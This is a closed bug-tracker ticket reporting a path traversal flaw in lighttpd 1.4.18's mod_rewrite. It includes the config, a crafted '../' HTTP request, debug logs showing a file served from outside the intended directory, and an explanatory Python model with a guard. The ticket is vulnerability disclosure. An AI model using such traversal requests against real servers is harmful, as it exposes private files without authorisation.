Opened 6 years ago
Closed 6 years ago
#130 closed defect (fixed)
mod_rewrite vulnerability
| Reported by: | sparrow@… | Owned by: | moo |
|---|---|---|---|
| Priority: | critical | Milestone: | |
| Component: | admin | Version: | |
| Keywords: | mod_rewrite | Cc: | |
| Application: | | PHP Version: | |
| Other Exts: | | SAPI: | Others |
| Probability: | | Blocked By: | |
| Blocking: | | | |
Description
lighttpd-1.4.18
lighttpd.conf:
$HTTP["host"] =~ "^(www\.)?(.)(.*)\.abc\.de:81$" {
server.document-root = "/home/abc_de"
url.rewrite-once = (
# files
---------> "^/files/(.*)$" => "/users/%2/%2%3/files/$1",
# site
"^(.*)$" => "/users/%2/%2%3/index.php/$1"
)
}
request:
telnet test.abc.de 81
---------> GET /files/../settings/myfile.gz HTTP/1.1
Host: abc.de:81
User-Agent: Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8.1.6) Gecko/20070830 Firefox/2.0.0.6
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
log:
(response.c.205) -- splitting Request-URI
******************************************************************************************************
**** Rewrite: ^/files/(.*)$
******************************************************************************************************
(response.c.206) Request-URI : /files/../settings/myfile.gz
(response.c.207) URI-scheme : http
(response.c.208) URI-authority: test.abc.de:81
(response.c.209) URI-path : /files/../settings/myfile.gz
(response.c.210) URI-query :
(response.c.205) -- splitting Request-URI
(response.c.206) Request-URI : /users/t/test/files/../settings/myfile.gz
(response.c.207) URI-scheme : http
(response.c.208) URI-authority: test.abc.de:81
(response.c.209) URI-path : /users/t/test/files/../settings/myfile.gz
(response.c.210) URI-query :
(response.c.260) -- sanatising URI
******************************************************************************************************
**** Vulnerability ****
(response.c.261) URI-path : /users/t/test/settings/myfile.gz
******************************************************************************************************
(mod_access.c.135) -- mod_access_uri_handler called
(response.c.375) -- before doc_root
(response.c.376) Doc-Root : /home/abc_de
(response.c.377) Rel-Path : /users/t/test/settings/myfile.gz
(response.c.378) Path :
(response.c.426) -- after doc_root
(response.c.427) Doc-Root : /home/abc_de
(response.c.428) Rel-Path : /users/t/test/settings/myfile.gz
(response.c.429) Path : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.446) -- logical -> physical
(response.c.447) Doc-Root : /home/abc_de
(response.c.448) Rel-Path : /users/t/test/settings/myfile.gz
(response.c.449) Path : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.466) -- handling physical path
(response.c.467) Path : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.474) -- file found
(response.c.475) Path : /home/abc_de/users/t/test/settings/myfile.gz
(response.c.613) -- handling subrequest
(response.c.614) Path : /home/abc_de/users/t/test/settings/myfile.gz
(mod_access.c.135) -- mod_access_uri_handler called
(mod_staticfile.c.394) -- handling file as static file
(response.c.625) -- subrequest finished
(response.c.114) Response-Header:
HTTP/1.1 200 OK
Content-Type: application/x-gzip
Accept-Ranges: bytes
ETag: "210873236"
Last-Modified: Sun, 30 Sep 2007 02:03:03 GMT
Content-Length: 6057
Date: Sun, 30 Sep 2007 13:50:39 GMT
Server: Apache Server
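The ordering visible in the log above, modelled as an added example (not part of the original ticket and not lighttpd code): the `files` rule matches the raw path, and dot segments are collapsed only afterwards, so the final path leaves `files/`. `checked_rewrite` is a hypothetical guard; the host `test.abc.de:81` is the URI-authority shown in the log.

```python
import posixpath
import re

# Constructed model of the ticket's vhost block: %2 and %3 come from the
# Host regex, $1 from the URL regex. This is an illustration, not lighttpd code.
HOST_RE = re.compile(r"^(www\.)?(.)(.*)\.abc\.de:81$")
FILES_RE = re.compile(r"^/files/(.*)$")


def rewrite_files(host, path):
    """Apply the ticket's 'files' rule to the raw request path.

    Returns (intended_base, rewritten_path), or None if the rule does not match.
    """
    h, u = HOST_RE.match(host), FILES_RE.match(path)
    if not (h and u):
        return None
    base = "/users/%s/%s%s/files" % (h.group(2), h.group(2), h.group(3))
    return base, base + "/" + u.group(1)


def sanitise(path):
    """Collapse '.' and '..' segments, like the 'sanatising URI' log step."""
    return posixpath.normpath(path)


def rewrite_then_sanitise(host, path):
    """Order seen in the log: rewrite the raw path, then collapse dot segments."""
    result = rewrite_files(host, path)
    return sanitise(result[1]) if result else None


def checked_rewrite(host, path):
    """Hypothetical guard: reject a target that no longer sits under files/."""
    result = rewrite_files(host, path)
    if result is None:
        return None
    base, target = result
    final = sanitise(target)
    if final != base and not final.startswith(base + "/"):
        raise PermissionError("rewrite target escapes " + base)
    return final
```
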
Change History (1)
comment:1 Changed 6 years ago by moo
- Resolution set to fixed
- Status changed from new to closed


please move to http://trac.lighttpd.net/, thanks